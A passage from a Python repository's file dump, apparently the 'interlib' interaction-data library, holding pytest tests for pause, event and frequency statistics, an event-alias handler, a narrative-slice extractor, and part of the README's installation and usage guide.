test_errors_type_of_pause(test_data):\n stats = Statistics(test_data)\n\n ts = dt(2020, 1, 1, 10, 00, 00)\n ts_behind = dt(2020, 1, 1, 9, 00, 00)\n\n with pytest.raises(ValueError):\n stats._type_of_pause(None, None)\n stats._type_of_pause(ts, ts_behind)\n\n with pytest.raises(TypeError):\n stats._type_of_pause(1.0, 2.0)\n\ndef test_pause_statistics(test_data, ground_truth):\n stats = Statistics(test_data)\n res = stats.pause_statistics(\n pauses_include_events = {'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n\n # for user, r in res.items():\n # print(user, 'sp', r['SP'], 'mp', r['MP'], 'lp', r['LP'], 'vlp', r['VLP'])\n\n for user, stat in ground_truth.items():\n # if user == '959c1a91-8b0f-4178-bc59-70499353204f':\n # print('sp', res[user]['SP'], 'mp', res[user]['MP'], 'lp', res[user]['LP'], 'vlp', res[user]['VLP'])\n assert res[user]['SP'] == stat['SP']\n assert res[user]['MP'] == stat['MP']\n assert res[user]['LP'] == stat['LP']\n assert res[user]['VLP'] == stat['VLP']\n\ndef test_empty_pauses_statistics(test_data):\n test_data_copy = test_data.copy()\n user_to_delete = list(test_data_copy.keys())[0]\n test_data_copy[user_to_delete] = [] # remove their events\n\n stats = Statistics(test_data_copy)\n res = stats.pause_statistics(\n pauses_include_events = {'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n\n assert res[user_to_delete]['SP'] == 0\n assert res[user_to_delete]['MP'] == 0\n assert res[user_to_delete]['LP'] == 0\n assert res[user_to_delete]['VLP'] == 0\n\ndef test_pauses_single_user(test_data, ground_truth):\n stats = Statistics(test_data)\n user = '959c1a91-8b0f-4178-bc59-70499353204f'\n \n result = stats.pause_statistics(\n user_id = user,\n pauses_include_events = {'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n\n assert result['SP'] == ground_truth[user]['SP']\n assert result['MP'] == ground_truth[user]['MP']\n assert result['LP'] == ground_truth[user]['LP']\n assert result['VLP'] == ground_truth[user]['VLP']\n\ndef test_pauses_single_user_errors(test_data):\n stats = Statistics(test_data)\n\n # test value error when pause statistics haven't already been calculated\n with pytest.raises(ValueError):\n stats.pause_statistics(user_id = '150b')\n \n # test type error when something other than a string is passed\n with pytest.raises(TypeError):\n stats.pause_statistics(user_id = 150)\n \n # calculate statistics to test errors in retrieval \n res = stats.pause_statistics()\n\n # test value error for when the user isn't in the stats or data\n with pytest.raises(ValueError):\n stats.pause_statistics(user_id = '150b')\n \n # test type error\n with pytest.raises(TypeError):\n stats.pause_statistics(user_id = 150)\n\n# ----- EVENT STATISTICS -----\ndef test_event_statistics(test_data, ground_truth, interaction_events):\n stats = Statistics(test_data)\n res = stats.event_statistics(interaction_events)\n\n # assert that the ground truth statistics are the same\n for user, stat in ground_truth.items():\n for event in interaction_events:\n assert res[user][event] == stat[event]\n\ndef test_include_lcc_and_usv(test_data, ground_truth, interaction_events):\n stats = Statistics(test_data)\n\n # add in the lcc and usv counts into the total events\n for user, stat in ground_truth.copy().items():\n ground_truth[user]['total_events'] += ground_truth[user]['LINK_CHOICE_CLICKED']\n ground_truth[user]['total_events'] += ground_truth[user]['USER_SET_VARIABLE']\n\n res = stats.event_statistics(\n interaction_events, include_link_choices = True, include_user_set_variables = True\n )\n\n assert len(res.keys()) == len(ground_truth.keys())\n\n # test that the stat's still match when LCC and USV are included in the total count\n for user, stat in ground_truth.items():\n for event in interaction_events:\n assert res[user][event] == stat[event]\n\ndef test_event_statistics_single_user(test_data, ground_truth, interaction_events):\n stats = Statistics(test_data)\n user = '959c1a91-8b0f-4178-bc59-70499353204f'\n\n # test that the stats are calculated for a single user and that they're correct\n res = stats.event_statistics(interaction_events, user_id = user)\n\n # test that each stat is correct\n for u, stat in ground_truth.items():\n if u == user:\n for event in interaction_events:\n assert res[event] == stat[event]\n\n res = Statistics(test_data).event_statistics(\n interaction_events, include_link_choices = True, \n include_user_set_variables = True, user_id = user\n )\n\n # add in the lcc and usv counts into the total events\n ground_truth[user]['total_events'] += ground_truth[user]['LINK_CHOICE_CLICKED']\n ground_truth[user]['total_events'] += ground_truth[user]['USER_SET_VARIABLE']\n\n # test that each stat is correct\n for u, stat in ground_truth.items():\n if u == user:\n for event in interaction_events:\n assert res[event] == stat[event]\n\ndef test_event_statistics_errors(test_data, ground_truth, interaction_events):\n stats = Statistics(test_data)\n\n # test type error is thrown when a non-set object is pass for \n # the interaction events\n with pytest.raises(TypeError):\n stats.event_statistics(interaction_events = [])\n\n # test that value error is thrown when an empty set is passed\n with pytest.raises(ValueError):\n stats.event_statistics(interaction_events = set([]))\n\n # test that a type error is thrown when a non-string user_id is passed\n with pytest.raises(TypeError):\n stats.event_statistics(interaction_events, user_id = 150)\n\n # test that a value error is thrown when user_id is not in data\n with pytest.raises(ValueError):\n stats.event_statistics(interaction_events, user_id = '150b')\n\n # calculate the statistics to test for retrieval errors\n res = stats.event_statistics(interaction_events)\n\n # test that a type error is thrown when user_id is not a string\n with pytest.raises(TypeError):\n stats.event_statistics(interaction_events, user_id = 150)\n\n # test that a value error is thrown when user_id is not in the data\n with pytest.raises(ValueError):\n stats.event_statistics(interaction_events, user_id = '150b')\n\n# ------ EVENT FREQUENCIES ------\ndef test_event_frequencies(test_data, event_frequencies, interaction_events):\n frequencies = [0, 1, 2, 3, 4, 5] # up to 10 minutes\n frequencies = [v * 60 for v in frequencies]\n\n stats = Statistics(test_data)\n res = stats.event_frequencies(frequencies, interaction_events)\n\n for user, freq in event_frequencies.items(): # for each of the users and their freq\n test_freq = res[user] # grab the test data for the user\n if test_freq: # if that user exists\n for time, counts in freq.items(): # time and the associated counts\n test_counts = test_freq[time] # get the event counts for the time slice\n for event, count in counts.items(): # for each event and it's count\n assert test_counts[event] == count # assert they're equal\n\ndef test_event_frequencies_single_user(test_data, event_frequencies, interaction_events):\n frequencies = [v * 60 for v in range(0, 6)]\n stats = Statistics(test_data)\n user = 'be3720be-3da1-419c-b912-cacc3f80a427'\n\n # test that the event frequencies are correct when fetching a single user\n res = stats.event_frequencies(frequencies, interaction_events, user_id = user)\n\n # for each of the time slices and counts\n for time, counts in event_frequencies[user].items():\n test_counts = res[time] # get the counts for the test slice\n for event, count in counts.items(): # for each event and count\n assert test_counts[event] == count # assert that they're the same\n\ndef test_event_frequencies_errors(test_data, event_frequencies, interaction_events):\n stats = Statistics(test_data)\n\n # test that a type error is thrown when:\n with pytest.raises(TypeError):\n # a non-list type is passed as event frequencies\n stats.event_frequencies(frequencies = {}, interaction_events = interaction_events)\n\n # a non integer/float list is passed as event frequencies\n stats.event_frequencies(frequencies = ['1', '2'], interaction_events = interaction_events)\n\n # a none string type is passed at the user id\n stats.event_frequencies(event_frequencies, interaction_events, user_id = 150)\n\n # a none string type is passed after the frequencies have been calculated.\n stats.event_frequencies(event_frequencies, interaction_events)\n stats.event_frequencies(event_frequencies, interaction_events, user_id = 150)\n\n # test that a value error is thrown when:\n with pytest.raises(ValueError):\n # an event frequencies empty list is passed\n stats.event_frequencies(frequencies = [], interaction_events = interaction_events)\n\n # a user id that is not in the data is passed\n stats.event_frequencies(event_frequencies, interaction_events, user_id = '150b')\n\n # a user id that is not in the data is passed after the freq's have been calculated\n stats.event_frequencies(event_frequencies, interaction_events)\n stats.event_frequencies(event_frequencies, interaction_events, user_id = '150b')\n\n\n# ------ OVERALL STATISTICS ------\ndef test_overall_statistics(test_data, ground_truth, interaction_events, time_stats):\n stats = Statistics(test_data, completion_point = 'Credits')\n res = stats.calculate_statistics(\n interaction_events, \n verbose = 0, \n include_link_choices = True, \n include_user_set_variables = True,\n pauses_include_events = {'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n\n for user, stat in ground_truth.items():\n for s_name, s_value in stat.items():\n if s_name in time_stats:\n assert s_value == pytest.approx(res[user][s_name], 0.1)\n else:\n assert s_value == res[user][s_name]\n\ndef test_overall_statistics_single_user(test_data, ground_truth, interaction_events, time_stats):\n stats = Statistics(test_data, completion_point = 'Credits')\n user = '959c1a91-8b0f-4178-bc59-70499353204f'\n\n individual_results = stats.calculate_statistics(\n interaction_events, \n user_id = user,\n include_link_choices = True,\n include_user_set_variables = True,\n pauses_include_events = {'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n individual_ground_truth_results = ground_truth[user]\n\n for stat, value in individual_results.items():\n if '_proportion' in stat or 'nec_time' in stat: continue # we'll test this further down\n\n if stat in time_stats:\n assert individual_ground_truth_results[stat] == pytest.approx(value, 0.1)\n else:\n assert individual_ground_truth_results[stat] == value\n \ndef test_overall_statistics_single_user_without_lcc_usv(test_data, ground_truth, interaction_events, time_stats):\n stats = Statistics(test_data, completion_point = 'Credits')\n user = 'b194b76c-7866-4b6d-8502-93ffe6322b64'\n\n # LCC and USV are included in the ground truth total events by default\n gt_individual = ground_truth[user]\n for stat, value in gt_individual.copy().items():\n if stat == 'LINK_CHOICE_CLICKED' or stat == 'USER_SET_VARIABLE':\n gt_individual['total_events'] -= gt_individual[stat]\n \n res_individual = stats.calculate_statistics(\n interaction_events, \n user_id = user,\n pauses_include_events = {'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n\n for stat, value in res_individual.items():\n if '_proportion' in stat or 'nec_time' in stat: continue # we'll test this further down\n \n if stat in time_stats:\n assert gt_individual[stat] == pytest.approx(value, 0.1)\n else:\n assert gt_individual[stat] == value\n \ndef test_overall_statistics_errors(test_data, ground_truth, interaction_events):\n stats = Statistics(test_data)\n\n # test that a type error is throw for passing a non-set interaction_events\n with pytest.raises(TypeError):\n stats.calculate_statistics(interaction_events = [])\n\n # test that a value error is thrown when passing an empty set\n with pytest.raises(ValueError):\n stats.calculate_statistics(interaction_events = set([]))\n\n # test that a type error is thrown when a set not containing strings is passed\n with pytest.raises(TypeError):\n stats.calculate_statistics(interaction_events = set([1, 2, 3, 4]))\n\n # if stats hasn't be calculated, test that TypeError is thrown when\n # a non-string user_id is passed\n with pytest.raises(TypeError):\n stats.calculate_statistics(\n interaction_events = interaction_events,\n user_id = 150\n )\n\n # if stats hasn't been calculated, test that a ValueError is thrown\n # when an invalid user_id is passed.\n with pytest.raises(ValueError):\n stats.calculate_statistics(\n interaction_events = interaction_events,\n user_id = '150b'\n )\n\n stats.calculate_statistics(interaction_events)\n\n # test the same two previous errors now the stats have been\n # calculated.\n with pytest.raises(TypeError):\n stats.calculate_statistics(\n interaction_events = interaction_events,\n user_id = 150\n )\n\n with pytest.raises(ValueError):\n stats.calculate_statistics(\n interaction_events = interaction_events,\n user_id = '150b'\n )\n\n# ----- TEST AVG NEC TIME STATISTICS -----\[email protected]\ndef additional_statistics():\n with open('tests/test_data_files/test_additional_statistics.json', 'r') as d_in:\n data = json.load(d_in)\n return data\n\ndef test_avg_nec_time(test_data, additional_statistics):\n stats = Statistics(test_data, n_jobs = 1)\n res = stats.time_statistics()\n\n for u, s in additional_statistics.items():\n avg = res[u]['avg_nec_time']\n assert s['avg_nec_time'] == pytest.approx(avg, rel=1)\n\n\n# ----- TEST NARRATIVE ELEMENT NORMALISED TIME ----\[email protected]\ndef narrative_element_durations():\n # return json.load(open('tests/test_data_files/narrative_element_durations.json', 'r'))\n return {\n 'Intro Message': 15.00\n }\n\ndef test_norm_time(test_data, narrative_element_durations):\n stats = Statistics(\n test_data, n_jobs = 1, narrative_element_durations=narrative_element_durations)\n res = stats.time_statistics()\n\n # for u, s in res.items():\n # print(u, s['norm_avg_nec_time'], s['norm_std_nec_time'])\n\n # appears to output the correct values - needs proper testing.\n " }, { "alpha_fraction": 0.5551064610481262, "alphanum_fraction": 0.5639989376068115, "avg_line_length": 35.970001220703125, "blob_id": "37af226f887bcadc6056aaf0c3aa3febc773018a", "content_id": "13f34dd7f686940b0706f93c13b17b6243e897e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3711, "license_type": "no_license", "max_line_length": 94, "num_lines": 100, "path": "/interlib/preprocessing/_event_handler.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\" \n\n\"\"\"\n\nfrom typing import List, Dict\n\nclass EventHandler():\n \n def __init__(self, aliases: Dict[str, str]):\n if not isinstance(aliases, dict):\n raise TypeError('aliases should be a dictionary, type: {0}'.format(type(aliases)))\n \n if len(aliases) == 0: raise ValueError('aliases is empty, it should be populated')\n\n self.aliases = aliases\n self._volume_tracker = 1.0\n\n def _video_scrub(self, event: Dict) -> str:\n \"\"\" \n \n :params event:\n :returns:\n \"\"\"\n # TODO Not yet implemented into the data.\n pass\n\n def _volume_change(self, event: Dict, action_name: str) -> str:\n \"\"\" \"\"\"\n changed_to_level = float(event['data']['romper_to_state'].split(' ')[1])\n if changed_to_level > self._volume_tracker:\n result = self.aliases[action_name] + '_UP'\n elif changed_to_level < self._volume_tracker:\n result = self.aliases[action_name] + '_DOWN'\n else:\n result = self.aliases[action_name] + '_NO'\n \n self._volume_tracker = changed_to_level\n return result\n\n def _fullscreen(self, event: Dict, action_name: str) -> str:\n \"\"\" \"\"\"\n if event['data']['romper_to_state'] == 'fullscreen':\n return 'TO_' + self.aliases[action_name]\n else:\n return 'FROM_' + self.aliases[action_name]\n\n def _browser_visibility_change(self, event: Dict, action_name: str) -> str:\n \"\"\" \"\"\"\n if event['data']['romper_to_state'] == 'hidden':\n return self.aliases[action_name] + '_H'\n else:\n return self.aliases[action_name] + '_V'\n\n def _subtitles(self, event: Dict, action_name: str) -> str:\n \"\"\" \"\"\"\n if event['data']['romper_to_state'] == 'showing':\n return self.aliases[action_name] + '_ON'\n else:\n return self.aliases[action_name] + '_OFF'\n\n def _window_orientation_change(self, event: Dict, action_name: str) -> str: \n \"\"\"\n \"\"\"\n # states: not_set, 90, -90, 0, 180, \"\", or 65446 (happens twice)\n if event['data']['romper_to_state'] in {90, -90}:\n return self.aliases[action_name] + '_H' # horizontal\n elif event['data']['romper_to_state'] in {0, 180}:\n return self.aliases[action_name] + '_V' # vertical\n else: # the odd case where it's near horizontal or vertical (\"\" or 65446)\n return self.aliases[action_name]\n \n def process_event(self, event: Dict) -> str:\n \"\"\" \n Given an event, get the short hand alias for it and \n append any useful additional information to it.\n \n :params event: the event to process (the whole event data as\n a dictionary)\n :returns: the alias representation of the event\n \"\"\"\n action_name = event['action_name']\n if action_name == 'VOLUME_CHANGED':\n return self._volume_change(event, action_name)\n elif action_name == 'FULLSCREEN_BUTTON_CLICKED':\n return self._fullscreen(event, action_name)\n elif action_name == 'BROWSER_VISIBILITY_CHANGE':\n return self._browser_visibility_change(event, action_name)\n elif action_name == 'WINDOW_ORIENTATION_CHANGE':\n return self._window_orientation_change(event, action_name)\n else:\n return self.aliases[action_name]\n\n def reset(self):\n \"\"\" \n This function should be called to reset the tracker variables\n in the class, such as the volume tracker, whenever a user's\n events have been processed.\n \"\"\"\n self._volume_tracker = 1.0\n return self \n \n " }, { "alpha_fraction": 0.6132497787475586, "alphanum_fraction": 0.6192181706428528, "avg_line_length": 32.5099983215332, "blob_id": "66f50806878b95a3ecd017b1c6492b380ab5a89c", "content_id": "b7de85fa1883cd4bbeef1acdab4d60e8ba7dcee0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3351, "license_type": "no_license", "max_line_length": 79, "num_lines": 100, "path": "/tests/test_preprocessing/test_event_handler.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "import pytest \nimport pickle, json, datetime\n\nfrom interlib.preprocessing._event_handler import EventHandler\n\[email protected]\ndef aliases():\n return {\n \"START_BUTTON_CLICKED\": \"SB\", \"PLAY_PAUSE_BUTTON_CLICKED\": \"PP\",\n \"BEHAVIOUR_CONTINUE_BUTTON_CLICKED\": \"BC\",\"LINK_CHOICE_CLICKED\": \"LC\",\n \"FULLSCREEN_BUTTON_CLICKED\": \"FS\", \"NEXT_BUTTON_CLICKED\": \"NB\",\n \"VIDEO_SCRUBBED\": \"VS\", \"SEEK_FORWARD_BUTTON_CLICKED\": \"SFW\",\n \"BACK_BUTTON_CLICKED\": \"BB\", \"SEEK_BACKWARD_BUTTON_CLICKED\": \"SBK\",\n \"USER_SET_VARIABLE\": \"US\", \"OVERLAY_BUTTON_CLICKED\": \"OB\",\n \"VOLUME_CHANGED\": \"VC\", \"OVERLAY_DEACTIVATED\": \"OD\",\n \"BROWSER_VISIBILITY_CHANGE\": \"BVC\", \"WINDOW_ORIENTATION_CHANGE\": \"WOC\",\n \"NARRATIVE_ELEMENT_CHANGE\": \"NEC\"\n }\n\n# ------ EVENT TESTS -------\ndef test_volume_change(aliases):\n eh = EventHandler(aliases)\n test_event = {\n 'action_name': 'VOLUME_CHANGED',\n 'data': {'romper_to_state': 'Background: 0.5'}\n }\n # default value is 1.0, so the volume has been decreased\n assert eh.process_event(test_event) == 'VC_DOWN'\n\n # increase the volumne\n test_event['data']['romper_to_state'] = 'Background: 0.7'\n assert eh._volume_tracker == 0.5\n assert eh.process_event(test_event) == 'VC_UP'\n assert eh._volume_tracker == 0.7\n\n # don't change the volume\n assert eh.process_event(test_event) == 'VC_NO'\n\n # reset the volume\n eh = eh.reset()\n assert eh._volume_tracker == 1.0\n\ndef test_fullscreen(aliases):\n eh = EventHandler(aliases)\n test_event = {\n 'action_name': 'FULLSCREEN_BUTTON_CLICKED',\n 'data': {'romper_to_state': 'fullscreen'}\n }\n assert eh.process_event(test_event) == 'TO_FS'\n\n # come out of full screen\n test_event['data']['romper_to_state'] = 'not-fullscreen'\n assert eh.process_event(test_event) == 'FROM_FS'\n\ndef test_browser_visibility_change(aliases):\n eh = EventHandler(aliases)\n test_event = {\n 'action_name': 'BROWSER_VISIBILITY_CHANGE',\n 'data': {'romper_to_state': 'hidden'}\n }\n assert eh.process_event(test_event) == 'BVC_H'\n\n # come to visible\n test_event['data']['romper_to_state'] = 'visible'\n assert eh.process_event(test_event) == 'BVC_V'\n\ndef test_window_orientation_change(aliases):\n eh = EventHandler(aliases)\n test_event = {\n 'action_name': 'WINDOW_ORIENTATION_CHANGE',\n 'data': {'romper_to_state': 90}\n }\n assert eh.process_event(test_event) == 'WOC_H'\n\n test_event['data']['romper_to_state'] = -90\n assert eh.process_event(test_event) == 'WOC_H'\n\n # to vertical\n test_event['data']['romper_to_state'] = 0\n assert eh.process_event(test_event) == 'WOC_V'\n\n test_event['data']['romper_to_state'] = 180\n assert eh.process_event(test_event) == 'WOC_V'\n\n # odd case\n test_event['data']['romper_to_state'] = \"\"\n assert eh.process_event(test_event) == 'WOC'\n\ndef test_all_events(aliases):\n eh = EventHandler(aliases)\n test_events = [{'action_name': ev} for ev in aliases.keys()]\n\n exclude = {\n 'VOLUME_CHANGED', 'FULLSCREEN_BUTTON_CLICKED', \n 'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'\n }\n for ev in test_events:\n if ev['action_name'] in exclude:\n continue\n assert eh.process_event(ev) == aliases[ev['action_name']]\n" }, { "alpha_fraction": 0.5003786683082581, "alphanum_fraction": 0.5041655898094177, "avg_line_length": 37.34951400756836, "blob_id": "e19e4f0987f8cbe8aa0471276656ad33ce747539", "content_id": "0105b6e7f342e3c5ed1e8f3075b24a55bd9f6b9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3961, "license_type": "no_license", "max_line_length": 99, "num_lines": 103, "path": "/interlib/preprocessing/slices.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\"\n \n\"\"\"\nimport pandas as pd \n\nfrom .base import BaseExtractor\nfrom .statistics import Statistics\nfrom ..util import to_dataframe\nfrom typing import Optional, List, Dict \n\nclass StatisticalSlices(BaseExtractor):\n\n def __init__(\n self, \n user_events: Dict[str, List[Dict]], \n interaction_events: List[str],\n narrative_element_durations: Optional[Dict[str, float]] = None \n ):\n super().__init__(user_events)\n\n self._slices = []\n self._interaction_events = interaction_events\n self._is_sliced = False\n self._nec_durations = narrative_element_durations\n\n def _window(self, events_arr, indices):\n event_slices = []\n\n for idx, val in enumerate(indices):\n chunk = []\n if val == indices[-1]: # last element in the list\n chunk = [ev for ev in events_arr[val:]]\n elif idx == 0 and val != 0: # first iteration\n chunk = [ev for ev in events_arr[0:val + 1]]\n else: # other it's in the middle\n chunk = [ev for ev in events_arr[val:indices[idx + 1] + 1]]\n \n event_slices.append(chunk)\n \n return event_slices\n\n def _get_indices(self, events_arr):\n return [\n idx \n for idx, ev in enumerate(events_arr) \n if ev['action_name'] == 'NARRATIVE_ELEMENT_CHANGE'\n ]\n\n def get_slices(self, as_df = False):\n if self._is_sliced:\n if as_df: return pd.DataFrame(self._slices)\n else: return self._slices\n\n for user, events in self.data.items():\n indices = self._get_indices(events)\n windows = self._window(events, indices)\n\n for wind in windows:\n # need to know what the completion point is... \n if wind[-1]['action_name'] == 'NARRATIVE_ELEMENT_CHANGE':\n end_point = wind[-1]['data']['romper_to_state']\n\n s = Statistics(\n {user: wind}, completion_point = end_point, n_jobs = 1,\n narrative_element_durations = self._nec_durations\n )\n wind_stats = s.calculate_statistics(\n self._interaction_events, \n include_link_choices = True\n )\n wind_stats[user]['abandon'] = False\n wind_stats[user]['from_state'] = wind[0]['data']['romper_to_state']\n wind_stats[user]['to_state'] = end_point \n wind_stats[user]['user'] = user\n\n # get the timestamp of the last element because the metrics are recorded\n # between the first and the last, so it's the metrics that have happened\n # in the build up to this timestamp\n wind_stats[user]['timestamp'] = wind[-1]['timestamp']\n else:\n # abandon\n s = Statistics(\n {user: wind}, n_jobs = 1, narrative_element_durations = self._nec_durations\n )\n wind_stats = s.calculate_statistics(\n self._interaction_events,\n include_link_choices = True \n )\n wind_stats[user]['abandon'] = True \n wind_stats[user]['from_state'] = wind[0]['data']['romper_to_state']\n wind_stats[user]['to_state'] = 'abandon'\n wind_stats[user]['user'] = user\n\n # time that the abandon happened.\n wind_stats[user]['timestamp'] = wind[-1]['timestamp']\n\n # self._slices[user].append(wind_stats[user])\n self._slices.append(wind_stats[user])\n \n self._is_sliced = True\n\n if as_df: return pd.DataFrame(self._slices)\n else: return self._slices\n \n\n\n" }, { "alpha_fraction": 0.7059119343757629, "alphanum_fraction": 0.7335612177848816, "avg_line_length": 47.51707458496094, "blob_id": "3d5eb3f721d85fa5f6965813cd9ee55fb73aaf0f", "content_id": "7446959111d5eed6c7bf6076f6dcf7c361c0165d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9946, "license_type": "no_license", "max_line_length": 528, "num_lines": 205, "path": "/README.md", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "# InterLib\n\n[![Build Status](https://travis-ci.com/JonoCX/interaction-lib.svg?token=sYqfGmcBzimeQwqRHqma&branch=master)](https://travis-ci.com/JonoCX/interaction-lib)\n\nInterlib is a data processing library created to work with interaction data. In their raw form, the interactions of users tell us little and need to be processed into workable and descriptive format. Using this library, you can extract session statistics, sequences, and perform various common processing tasks that I have found useful in the past.\n\n## Installation\n\nCurrently, the package is not available on the pip package manager -- it will be once the library has been open sourced along side some data -- so the process to install involves installing directly from Github. (Please ensure that you have an appropriate Python 3.6+ virtual environment installed and activated before installing this package, I would recommend Anaconda (Miniconda: https://docs.conda.io/en/latest/miniconda.html)).\n\n```bash\n$ pip install -e git+https://github.com/JonoCX/interaction-lib.git#egg=interlib\n```\n\n## Usage\nThe library makes the presumption that you have interaction data in a particular format as a json file:\n\n```json\n{\"<user_1>\": [\n {\"id\": 1,\n \"user\": \"<user_1>\",\n \"timestamp\": \"datetime.datetime(2019, 8, 5, 16, 26, 36, 940000)\",\n \"action_type\": \"STORY_NAVIGATION\",\n \"action_name\": \"NARRATIVE_ELEMENT_CHANGE\",\n \"data\": {\n \"romper_type\": \"STORY_NAVIGATION\",\n \"romper_name\": \"NARRATIVE_ELEMENT_CHANGE\",\n \"romper_id\": \"\",\n \"romper_from_state\": \"null\",\n \"romper_to_state\": \"Intro Message\",\n \"current_narrative_element\": \"null\",\n \"current_representation\": \"\"\n }}, {}],\n\"<user_N>\": []}\n```\n\nThe data snippet above is a single event, in a parsed format, recorded in an interactive experience. It is a dictionary of user and a list of events. If you're working with raw data extracted directly from an experience, then it will not be in the above format. As such, the library includes a utility method to convert raw data (from an SQL dump) into a usable format:\n\n```python\nfrom interlib.util import to_dict\nuser_events = to_dict('path/to/json.json')\n```\n\nThe `to_dict` function has additional parameters that can be passed, for example if you're dealing with a large amount of data then perhaps you'll want to split the data into chunks (useful for parallel processing):\n\n```python\nuser_events = to_dict('path/to/json.json', split = True) # splits into two, or;\nuser_events = to_dict('path/to/json.json', split = 4) # splits into four\n```\n\nWhile in some cases, you may want to only process a select group of users:\n\n```python\nusers = set([<user_1>, <user_2>]) # a set of user id strings\nuser_events = to_dict('path/to/json.json', users_to_include = users)\n```\n\nThere are a range of other parameters that can be set, please explore: [View to_dict function](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/util/data.py#L71)\n\n## Statistics\nThere are a range of statistics that can be extracted using the library: \n\n- [Time](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/preprocessing/statistics.py#L42): hidden time, session length, time to completion, raw session length, reach end;\n- [Pauses](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/preprocessing/statistics.py#L239): short (1 to 5 seconds), medium (6 to 15), long (16 to 30), very long (30+), as counts;\n- [Events](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/preprocessing/statistics.py#L304): counts and relative frequencies of interaction events;\n- [Event Frequences](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/preprocessing/statistics.py#L410): given a set of time thresholds, the frequency for each event in those thresholds\n\nAgain, the statistics package works under the assumption that you have parsed the raw events into the format described above. \n\nIf you want to [calculate all statistics](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/preprocessing/statistics.py#L595) -- excluding event frequencies -- then do the following:\n\n```python\nfrom interlib.preprocessing.statistics import Statistics\n\ninteraction_events = set(['NARRATIVE_ELEMENT_CHANGE', 'NEXT_BUTTON_CLICKED', ...]) # set of all user events you want to consider\nstats = Statistics(\n user_events, # the user -> list of events dictionary\n completion_point = 'Make step 25', # the point in the experience determined to be the end\n n_jobs = -1 # the number of cores to run on (-1, which is a run on all available cores, is the default)\n)\nuser_statistics = stats.calculate_statistics(interaction_events)\nprint(user_statistics)\n```\n\n```json\n{\"<user_1>\": {\n \"hidden_time\": 0.0, \"time_to_completion\": 1722.157, \"reach_end\": True, \"raw_session_length\": 1847.197,\n \"session_length\": 1847.197, \"SP\": 4, \"MP\": 0, \"LP\": 4, \"VLP\": 25,\n \"NEXT_BUTTON_CLICKED\": 56, \"BACK_BUTTON_CLICKED\": 0, \"VIDEO_SCRUBBED\": 0, \"VOLUME_CHANGED\": 0,\n \"REPEAT_BUTTON_CLICKED\": 1, \"BROWSER_VISIBILITY_CHANGE\": 0, \"SWITCH_VIEW_BUTTON_CLICKED\": 2,\n \"NARRATIVE_ELEMENT_CHANGE\": 30, \"FULLSCREEN_BUTTON_CLICKED\": 0, \"OVERLAY_BUTTON_CLICKED\": 2,\n \"SUBTITLES_BUTTON_CLICKED\": 0, \"PLAY_PAUSE_BUTTON_CLICKED\": 0, \"LINK_CHOICE_CLICKED\": 0,\n \"USER_SET_VARIABLE\": 0, \"total_events\": 91},\n\"<user_N>\": {}, }\n```\n\nIf you want to calculate specific statistics, e.g. the time statistics, the library provides that option:\n\n```python\nfrom interlib.preprocessing.statistics import Statistics\n\n# create a Statistics object\nstats = Statistics(\n user_events,\n completion_point = 'Make step 25', # without this, some statistics cannot be calculated (reached end and time to completion)\n n_jobs = -1\n)\ninteraction_events = set(['NARRATIVE_ELEMENT_CHANGE', 'NEXT_BUTTON_CLICKED', ...]) # set of all user events you want to consider\n\n# calculate the time statistics\ntime_statistics = stats.time_statistics()\n\n# calculate pause statistics\npause_statistics = stats.pause_statistics()\n\n# calculate event statistics\nevent_statistics = stats.event_statistics(\n interaction_events = interaction_events\n)\n\n# calculate event frequencies\nevent_frequencies = stats.event_frequencies(\n frequencies = [0, 60, 120, 180], # indicates that you want frequencues for minutes 0 to 1, 1 to 2, and 2 to 3.\n interaction_events = interaction_events\n)\n\n# You can also fetch just the session lengths from the user events\nsession_lengths = stats.calculate_session_length()\n```\n\nNote regarding `n_jobs`: When setting the `n_jobs` parameter, if you have a small dataset then use a single (1) core otherwise the default will result in slow performance. I would recommend incrementally increasing the parameter when the data size is over 2GB (i.e., 2 cores for 2 to 4GB, 3 cores for 4 to 6GB, 4+ cores for 6GB+). The parameter also sets how computation is performed throughout the extractor you're working with, i.e. if `n_jobs = -1` in `Statistics` then all functions in that object will use `-1` cores (all).\n\n## Sequences\nAn alternative data representation is sequences, where the events are processes into a common format and their temporal ordering is preserved. Before starting, you need to define both the interaction events that you want to include in the sequences 